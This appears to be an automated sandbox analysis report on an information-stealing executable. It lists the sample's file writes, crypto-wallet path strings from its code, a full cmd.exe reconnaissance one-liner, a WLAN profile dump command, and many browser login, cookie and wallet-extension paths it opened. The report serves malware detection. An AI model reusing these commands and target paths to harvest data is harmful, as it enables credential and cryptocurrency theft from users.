            Source: Yara matchFile source: 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rename_me_before.exe PID: 3512, type: MEMORYSTR
            Detected generic credential text file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\Browsers\Cookies.txtJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\Browsers\Firefox\History.txtJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\network_info.txtJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\system_info.txtJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\process_info.txtJump to behavior
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: rename_me_before.exe, 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "Electrum": os.path.join(self.RoamingAppData, "Electrum", "wallets"),
            Source: rename_me_before.exe, 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "Jaxx": os.path.join(self.RoamingAppData, "com.liberty.jaxx", "IndexedDB", "file__0.indexeddb.leveldb"),
            Source: rename_me_before.exe, 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "Exodus": "aholpfdialjgjfhomihkjbmgjidlcdno",
            Source: rename_me_before.exe, 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "Ethereum": os.path.join(self.RoamingAppData, "Ethereum", "keystore"),
            Source: rename_me_before.exe, 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "Ethereum": os.path.join(self.RoamingAppData, "Ethereum", "keystore"),
            Gathers network related connection and port information
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Tries to harvest and steal WLAN passwords
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pingsJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldoomlJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64fJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfndJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.filesJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanentJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chromeJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareportingJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieafJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkibJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackupsJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285fJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.filesJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.filesJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pingsJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archivedJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\eventsJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfakJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.filesJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\TempJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumpsJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98aJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.defaultJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idbJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeeaJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BookmarksJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporaryJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashesJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\defaultJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.filesJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backupsJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removedJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_stateJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storageJump to behavior
